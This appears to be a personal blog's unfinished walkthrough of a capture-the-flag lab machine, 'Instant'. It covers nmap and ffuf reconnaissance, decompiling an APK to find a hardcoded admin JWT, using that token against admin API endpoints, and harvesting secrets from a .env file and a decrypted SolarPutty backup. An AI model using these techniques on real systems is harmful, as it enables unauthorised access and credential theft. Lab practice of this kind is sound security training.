Index Blog Links

1. NMAP

sudo nmap -sC -sV --vv -p- 10.129.231.155 -T5

PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMM6fK04LJ4jNNL950Ft7YHPO9NKONYVCbau/+tQKoy3u7J9d8xw2sJaajQGLqTvyWMolbN3fKzp7t/s/ZMiZNo=
|   256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+zjgyGvnf4lMAlvdgVHlwHd+/U4NcThn1bx5/4DZYY
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://instant.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)
22193/tcp filtered unknown no-response
51482/tcp filtered unknown no-response
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Port 80

Subdomains

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://instant.htb/ -H 'Host: FUZZ.instant.htb' -fc 301

Services

└─$ whatweb http://instant.htb                                                              
http://instant.htb [200 OK] Apache[2.4.58], Bootstrap[4.0.0], Country[RESERVED][ZZ], Email[support@instant.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.58 (Ubuntu)], IP[10.129.231.155], JQuery[3.2.1], Script, Title[Instant Wallet]

Link provides an apk

3. Port 22193

4. Port 51482

5. Jadx

jadx-gui

Open instant.apk

Found subdomain: http://mywalletv1.instant.htb/api/v1/view/profile

Found Header "Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

JWT content:

Adding subdomain to etc/hosts Gives profile of admin

Login part

  JsonObject jsonObject = new JsonObject();
        jsonObject.addProperty("username", str);
        jsonObject.addProperty("password", str2);
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/login")
        .post(RequestBody.create(MediaType.parse("application/json"), jsonObject.toString())).build()).enqueue(new Callback()

Register form:

public void register(String str, String str2, String str3, String str4) {
        JsonObject jsonObject = new JsonObject();
        jsonObject.addProperty("username", str);
        jsonObject.addProperty(NotificationCompat.CATEGORY_EMAIL, str2);
        jsonObject.addProperty("password", str3);
        jsonObject.addProperty("pin", str4);
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/register")
        .post(RequestBody.create(MediaType.parse("application/json"),

Transaction form:

    public void sendFunds(String str, String str2, String str3, String str4, String str5) {
        JsonObject jsonObject = new JsonObject();
        jsonObject.addProperty("receiver", str);
        jsonObject.addProperty("amount", str2);
        jsonObject.addProperty("note", str3);
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/initiate/transaction").addHeader("Authorization", str4).post(RequestBody.create(MediaType.parse("application/json"),
    }

JsonObject jsonObject = new JsonObject();  
jsonObject.addProperty("pin", this.val$pin);  
url("http://mywalletv1.instant.htb/api/v1/confirm/pin")
.header("Authorization", this.val$access_token)
 .post(RequestBody.create(MediaType.parse("application/json")

On res/xml

6. SSH

Login as shirohige save rsa key locally chmod it

Linpeas on target:

╔══════════╣ Analyzing Env Files (limit 70)
-rw-r--r-- 1 shirohige shirohige 71 Aug  8 19:34 /home/shirohige/projects/mywallet/Instant-Api/mywallet/.env   
SECRET_KEY=VeryStrongS3cretKeyY0uC4NTGET

/home/shirohige/.mysql_history

On /opt there is a sollar putty file for sessions-backup.dat

Void decryptor online has a decryptor for this type of files

12**24nzC!r0c%q12

6. Swagger subdomain

└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/list/users" -H  "accept: application/json" -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA'

{"Status":200,"Users":[
{"email":"admin@instant.htb",
"role":"Admin",
"secret_pin":87348,
"status":"active",
"username":"instantAdmin",
"wallet_id":"f0eca6e5-783a-471d-9d8f-0162cbc900db"
},
{"email":"shirohige@instant.htb",
"role":"instantian",
"secret_pin":42845,
"status":"active",
"username":"shirohige",
"wallet_id":"458715c9-b15e-467b-8a3d-97bc3fcf3c11"}]}

maybe with jwt found

©
2025 Daniel Andrade 👨🏻‍💻